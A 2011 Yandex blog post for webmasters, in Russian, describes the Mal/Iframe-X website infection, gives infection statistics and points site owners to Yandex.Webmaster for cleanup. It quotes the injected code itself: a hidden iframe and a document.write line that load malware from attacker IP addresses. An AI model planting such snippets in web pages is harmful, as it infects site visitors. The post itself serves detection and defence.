Блог Яндекса для вебмастеров

Вредоносный фрейм Mal/Iframe-X

8 октября 2011, 09:04
В последнее время наша система существенно чаще, чем обычно, находит сайты с вредоносным кодом, который относится к Mal/Iframe-X по классификации компании Sophos. Рекомендуем вам проверить, нет ли на страницах ваших сайтов подобного вредоносного кода.

В последнее время наша система существенно чаще, чем обычно, находит сайты с вредоносным кодом, который относится к Mal/Iframe-X по классификации компании Sophos. Динамика числа уникальных хостов, заражённых данным вредоносным кодом, выглядит так:



Признаком заражения страницы Mal/Iframe-X является обнаружение в DOM тега IFRAME, в который загружается браузерный вредоносный код. Примерно в 75% случаев это происходит при прописывании этого тега непосредственно в HTML-коде страницы, в оставшихся 25% – при выполнении в контексте браузера специального JavaScript-файла, который дописывает тег в код страницы.


  • Пример вредоносного кода в HTML-страницах:

    <iframe frameborder=0 src="http://64.247.185.149/Home/index.php" width=1 height=1 scrolling=no>
  • Пример вредоносного кода в JavaScript-файлах:

    document.write('<iframe frameborder=0 src="http://65.75.160.235/Home/index.php" width=1 height=1 scrolling=no>)
  • В атрибуте SRC вредоносного IFRAME практически всегда содержится URL вида:

    http://IP_ADDRESS/Home/index.php
    где IP_ADDRESS - это IP-адрес сервера злоумышленников, с которого подгружается основная часть  вредоносного кода.


Как видно из графика ниже, особой популярностью у злоумышленников, распространяющих  код Mal/Iframe-X, пользуются сайты в доменной зоне COM. Доли доменных зон выглядят следующим образом:



Для распространения основной части вредоносного кода злоумышленники используют серверы с различными IP-адресами, но примерно в четверти случаев это IP-адрес 64.247.185.149&. Доли серверов злоумышленников, которые участвуют в заражении, выглядят следующим образом:



Упрощённая схема работы Mal/Iframe-X выглядит так:




Рекомендации

Рекомендуем вам проверить, нет ли на страницах ваших сайтов подобного вредоносного кода. Если вы не знаете, является ли ваш сайт источником распространения вредоносного кода, или о сайте известно, что он заражён, но непонятно, что это за вредоносный код и как от него избавиться – вы можете зарегистрироваться на сервисе Яндекс.Вебмастер, с помощью которого можно посмотреть детальную информацию о заражении, рекомендации по его лечению, а также запустить внеочередную перепроверку сайта.

Дополнительная информация о том, как обезопасить сайт и компьютер в интернете, содержится в статьях:
6 комментариев
Подписаться на комментарии к посту

А как проверить? Или в Я.Вебмастере смотреть ?

Очень хорошая запись, а главное - очень подробно всё опиисано. Но - надо было в пятницу это публиковать, потому как - в пятницу были бы все форумы "про сайты" запружены вопросами от школоты "что такое, как бороться, проверьте мой сайт на народе - подозреваю, чешусь"... В субботу - уже не то, администрация ресурсов с похмела - будет выпиливать темы, не иначе..

Удалила такой код... Ох и достал он меня...

А что у меня с яндексом сегодня происходит ? вообще не открывается :(((

кто-нибудь поделитесь алгоритмом, как разрешить при публикации только iframe с ютуба и подобных сайтов, а остальные чтоб резались? желательно на php =)